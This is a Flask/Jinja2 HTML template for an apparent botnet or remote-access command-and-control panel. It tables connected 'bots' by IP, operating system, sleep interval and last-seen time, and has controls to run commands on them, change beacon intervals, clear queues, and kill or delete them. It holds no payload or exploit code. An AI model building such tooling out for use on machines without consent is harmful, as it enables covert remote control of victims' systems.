{% extends "base.html" %}
{% block content %}
<div class="modal fade" id="modal-pop" tabindex="-1" role="dialog">
    <div class="modal-dialog">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
                <input id="botid" name="botid" type="hidden" value="">
                <h4 class="modal-title"></h4>
            </div>
            <div class="modal-body">
                <div class="row">
                    <div class="col-md-6">
                        <i id="OSicon"></i><h3 id="cliOS"></h3>
                    </div>
                    <div class="col-md-6">
                        <button id="clearqBot" type="button" class="btn btn-info pull-right">Clear Queue</button>
                        <button id="killBot" type="button" class="btn btn-danger pull-right">Kill</button>
                        <button id="delBot" type="button" class="btn btn-danger pull-right">Delete</button>
                    </div>
                </div>
                <div class="row">
                    <div class="col-md-12">
                        <div class="tabbable">
                            <ul class="nav nav-tabs">
                                <li class="active"><a href="#last-response" data-toggle="tab">Last Response</a></li>
                                <li><a href="#command-queue" data-toggle="tab">Command Queue</a></li>
                                <li><a href="#run-command" data-toggle="tab">Run Command</a></li>
                                <li><a href="#sleep-interval" data-toggle="tab">Sleep Interval</a></li>
                            </ul>
                            <div class="tab-content">
                                <div class="tab-pane active" id="last-response">
                                    <pre id="lastResponse"></pre>
                                </div>
                                <div class="tab-pane" id="command-queue">
                                    <pre id="cmdq"></pre>
                                </div>
                                <div class="tab-pane" id="run-command">
                                    {{cmd_form.command.label}} {{cmd_form.command}}
                                </div>
                                <div class="tab-pane" id="sleep-interval">
                                    {{int_form.interval.label}} {{int_form.interval}}
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="modal-footer">
                <button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
                <button type="button" id="submit-btn" class="btn btn-info">Save changes</button>
            </div>
        </div>
    </div>
</div>
<div class="row">
    <div class="col-md-12">
        <button class="btn btn-info" id="cmdall" type="button">Command On Selected</button>
        <button class="btn btn-info" id="sleepall" type="button">Set Sleep On Selected</button>
        <button class="btn btn-info" id="clearqall" type="button">Clear Queue On Selected</button>
        <button class="btn btn-danger" id="killall" type="button">Kill Selected</button>
        <button class="btn btn-danger" id="delall" type="button">Delete Selected</button>
    </div>
</div>
<div class="row">
    <div class="col-md-12">
        <table class="table table-striped table-hover table-responsive table-bordered">
            <thead>
                <tr>
                    <th><input type="checkbox" name="allbot"> ID</th>
                    <th>IP Address</th>
                    <th>Operating System</th>
                    <th>Sleep Interval (Seconds)</th>
                    <th>Last Seen (Seconds)</th>
                </tr>
            </thead>
            <tbody id="tb">
                {% for bot in bots %}
                <tr id="row{{bot.id}}">
                    <td><input type="checkbox" name="botcb" value="{{bot.id}}"></td>
                    <td>{{bot.ip}}</td>
                    <td>{{bot.os}}</td>
                    <td id=\"intervaltd\">{{bot.sleep_interval}}</td>
                    <td>{{bot.last_seen|round|int}}</td>
                </tr>
                {% endfor %}
            </tbody>
        </table>
    </div>
</div>
<meta name="csrf-token" content="{{ csrf_token() }}">
{% endblock content %}

{% block footer %}
<script src="{{url_for('static', filename='custom/bots.js')}}"></script>
<script>
$(document).ready(function() {
    csrf();
    $('#submit-btn').hide();
    window.setInterval(clients_list, 1000);
    $('a[data-toggle="tab"]').on('shown.bs.tab', modal_tabs);
    $('#submit-btn').click(submit_to_api);
    $('#delBot').click(delete_bot);
    $('#killBot').click(kill_bot);
    $('#clearqBot').click(clearq_bot);
    $('input:checkbox[name="allbot"]').click(select_all_checkboxes);
    $('#delall').click(delete_all_checked);
    $('#killall').click(kill_all_checked);
    $('#cmdall').click(command_all_checked);
    $('#sleepall').click(sleep_all_checked);
    $('#clearqall').click(clearq_all_checked);
    $("#command").keyup(submit_on_enter);
    $("#interval").keyup(submit_on_enter);
});
</script>
{% endblock footer %}
